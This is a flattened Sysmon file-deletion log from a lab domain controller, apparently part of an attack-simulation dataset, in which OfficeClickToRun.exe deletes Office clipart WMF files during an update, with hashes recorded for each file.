23542300x800000000000000065349Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD01176_.WMFMD5=AE29A32626F90B7C8B396898B59B4E9F,SHA256=435AFBCBA8947437E238D94BB973996C1FBCA94CA59A453C2755A3F0033093AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065348Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD01173_.WMFMD5=6AC8AE8BD86CDA0775C3BD93759438A9,SHA256=12B69DABA415C3C2C90A8B7892413575350BC326A37A1A80DA7D5E18FA37443C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065347Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD01172_.WMFMD5=CA39D8994F7170E8702EFEE36C088A9B,SHA256=81D24FDB5F9088075B696D8012E441C2359E8F22CE23DDF1C11EF2669A8DE104,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065346Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.158{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D144BB6D60C02AF6D81C37C990D4B11,SHA256=941BF7497ACD8BA8CA1B780FFF6B333487F429CF49009F9E03164FE76F5DC0EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065345Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD01171_.WMFMD5=6AB36BDF013C1602A49DFD086EA4498B,SHA256=585B23A9EE96C1730ED9FCA10C11431478897D75A47FB040831E9F792E036083,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065344Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD01170_.WMFMD5=8E4A1C5DB5B450E0365CB725F9A42519,SHA256=6ECC13C39673C8F72678C701B23F322C584BADF4E27E3A5D01FB49F8747D7E5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065343Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD01169_.WMFMD5=B7A07F08D323E3F33DCFBF62605BA381,SHA256=B1237D35BB40DC05793C945601640CA89D6D182787EC213E907A6E3BA74DA4AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065342Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD01168_.WMFMD5=A48231578A59604EC6588404904BB7C2,SHA256=8E7FFB23B60EDFCCBBADBE7E8B0F292002979A2D7C007BAB543CF60786821F85,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065341Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD01167_.WMFMD5=6F25B26783C097D5E3F82A05E47F4759,SHA256=F8BFC6E6A577807C703BA8C62EC89900C7886D7F30516F883B17F81763A76DFF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065340Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD01166_.WMFMD5=8B846110436BD48A71A53CB690E76555,SHA256=A6F46F2F76B9F9FDA730E35C29492BC23857FDAD15C3A26756C69032B88D7B43,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065339Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD01163_.WMFMD5=BAFD288F41AEE0060CBC37077E718DD9,SHA256=EB4102C7A42E51736DF52CFF679A0B6A24EC074D7E415224626373C1A1ED1386,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065338Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD01162_.WMFMD5=0964A67B2552C332BC500D49275B6EA7,SHA256=26299AE5DB740243AAF55FBC973A345FD359C444C14A5FF83455EA0CA1FBE65F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065337Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD01160_.WMFMD5=0EDA26930843C106E3A4F1DDAC28F62C,SHA256=E892C9BC7DBD28C5EC9212D623BCADF7BB72BB8C9E95268907DABD2590758DA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065336Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD01157_.WMFMD5=C5614C0603163BEFE8C3ADAE36DAE522,SHA256=62AA3E7984D5EB9B5AF7CC1271C2F5B9EAB86A309803C8B212D498201C4A8F41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065335Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD01152_.WMFMD5=1F256FF3F379574BEA64477A55A1C141,SHA256=A12D42D51859FF36F1A4D046CF8584FF608404B69609A121C428D018EB91005C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065334Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD01151_.WMFMD5=A498092A45B7FCB0347EA5612A9D3735,SHA256=8BE78D21C7EFD85CB99FD36D911E60228603BA2646C8BBD1A8C32C8F274DCC32,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065333Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD01146_.WMFMD5=8F29A3C315FCF53A3EF31175349C45C1,SHA256=C414B34BF1ACB4BDF7E21BDCFCD838BA949610DB2CAC652094083D804B08FCC9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065332Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD01145_.WMFMD5=E70C427793DF572655E4966F686ED9CB,SHA256=F030E835FBC23AD1FCFEECC9A212BC3472B82286B9B8D3F08B05254A482031C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065331Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD01143_.WMFMD5=70A01497FECEA4A7961B64BB04E8FD30,SHA256=9887154D0A90B2717ECFDBB1C56EFA1989013195CCF574A04D6525BD2077041C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065330Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD01140_.WMFMD5=7267E0857A43BB1F12941ED7789EEBB8,SHA256=99B1533D8D7350D36C30228FF4130DB12807B2678A999716570A1C2BBE4C679E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065329Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD01139_.WMFMD5=D87C4084B871CCECDB4A514B7FCDA78C,SHA256=C3A97C50236D12BC0AD1F85BD979FE0BCDFCAAF23DB0F735ECEE09ABC85AFE9A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065328Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD01138_.WMFMD5=C99DA6C0CABD4724E802A1182288AEDD,SHA256=8B65E5F930C5F3F655E9E16ADD55F2E0442AA5A0FC67EABE13EBA632DA8974A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065327Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD01039_.WMFMD5=5FF3CD1B632776FF24D417AE7F26FABA,SHA256=99D76923D916FFA6DF0C133E9C7E2533C3B86495529582690E2CB8CE70A63530,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065326Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.127{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD01015_.WMFMD5=964CBAB7360FD2D286CE2F0AA02A3CC8,SHA256=94984C9973C248015898F7C1445B902F202E2C7A985F53798CBFCA49C3CBFCC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065325Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.127{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD00705_.WMFMD5=9FB283D882BAB5E50A4DBB426BBC29CC,SHA256=16D456423BD3BC657B64820EA91285D317A14226301E55FAB1D790A3F6AEE52A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065324Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.127{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD00687_.WMFMD5=F68BBD20E0C61737CAE65ADF236C2624,SHA256=736E3C034209FBB679E8D7918F04FF604DCD80399D6DDDB6FF7E1DD712EBBA8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065323Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.127{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD00449_.WMFMD5=42199763FE4998ED4E44A5C30A57EA5E,SHA256=8573CA4DFFE053A0312538BC5E7D2617C15B51C3097A310CFDB497EA8B9F6110,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065322Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.127{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD00448_.WMFMD5=EC23BF720E8E7B9A259AEE47E20542B8,SHA256=23F28DB41D929FFC773AB27743EE0124EB5FC043E8D1BEE69A014573CFB83CFC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065321Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.127{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD00437_.WMFMD5=975DBEAE3FD57DEC0C2AE796E73F2AFA,SHA256=9A146BC29419533B3629E451A99366EEAAFDFFCF2F2E3FFE164B833B32DFD527,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065320Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.127{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD00419_.WMFMD5=C4D347D9519D48AE4119CAF772C65FA4,SHA256=A05E98DFDEB1D038C952CE282E3CC362C66278399360C0BB46E6A22CBADF92E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065319Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.127{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD00414_.WMFMD5=85ABB56CCD2A1403F9A4F9CD91D7E0BE,SHA256=3156B83E19B6A27517664D11701B7E2A93516811E971646C0D40E4D1C20536B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065318Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.127{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD00413_.WMFMD5=E0B908A7F7B471267C8D7671742930C2,SHA256=45C87F72B6F9F67551367A23AFC77B7CA197646BB67A2812EF700D239AD467C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065317Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.127{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD00407_.WMFMD5=DC5FFF07A0584F3788750B25F475C752,SHA256=34228455E2CE91C1B6A837BC92333621F3C3B7751D68A9DA46240794F368F585,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065316Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.127{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD00405_.WMFMD5=79F27D6D3A326BF785951E83E39260DF,SHA256=CE5A9638499798437536F244E8EB577EF410F15C37C2D2417EA0E715AF8D8E33,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065315Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.127{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD00372_.WMFMD5=F1FDF0A0CE06A0C73B69BDD45A3C5275,SHA256=726D56D5CBF6590E1B66FBA9068C2D4314841D9630361C8B6A9DEF07488FE6B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065314Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.127{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD00297_.WMFMD5=991E3A1B71D9EEFB1D8BB08E9831A000,SHA256=65951E8260AEF3E8988901D2402F2BF6E46876D035E6858BA9D116CB1F44BAFC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065313Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD00261_.WMFMD5=635712D32E3C8B597D69A41FE9C11C1C,SHA256=4C11ECA261180FCF50C750D041D1AAAC5C6773549491066CDBC1848A7E88ED8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065312Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD00256_.WMFMD5=F6549ADCB2DCAFC7021F82E2EB3E50CD,SHA256=619F3F0D7C15553ECD87228CF3C89457F9DFC072C60F3B70471E09A75DAAD158,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065311Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD00255_.WMFMD5=E4672DD6F2DB194B4EEF71B6600A6438,SHA256=91E60092710EE6553883C6212BD702F1092BCC82333942155B7D06B84E8510BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065310Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD00234_.WMFMD5=1C868387195CE3D47DAEC68FE41F34FA,SHA256=633EF706586519850FE74166354C08A981EBDB307BDB0C662627AFBD68EF26C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065309Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD00121_.WMFMD5=938FEE6FD7FC7CFD4C1B810474AC0BF0,SHA256=672E7BDEBC0E2B6D5E3D049F5D6E9634F467976104917EFDEB4DDF5A360FAE71,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065308Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD00117_.WMFMD5=476344FDCA4F860B907B6231DC09DA10,SHA256=ED390C0FBF2C8BFC749B5FB34873D6693FF6F2DE2D9E115C02B83676C0C37B75,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065307Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\CUPINST.WMFMD5=B9BAAD6A02E8B4F51F39F6E585738368,SHA256=0F36C74F69E4FB8D46AC46CBA81F15B147A772259FCD5C0C529B71A58A7C6CEC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065306Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\CUP.WMFMD5=67E1688B6AB551C6DC85A2CF7E006BC2,SHA256=B232B240C0974C279D2FD81D66617880AF9AEC85CB2481A06562FBCF76A2C682,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065305Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\CRANINST.WMFMD5=31BBA11B84D955630781347801D4FE82,SHA256=8541180B2A615171A3F7245089CD58C3A135D7DBF7AECD6DD7CB999C9B8C11BA,IMPHASH=00000000000000000000000000000000falsetrue 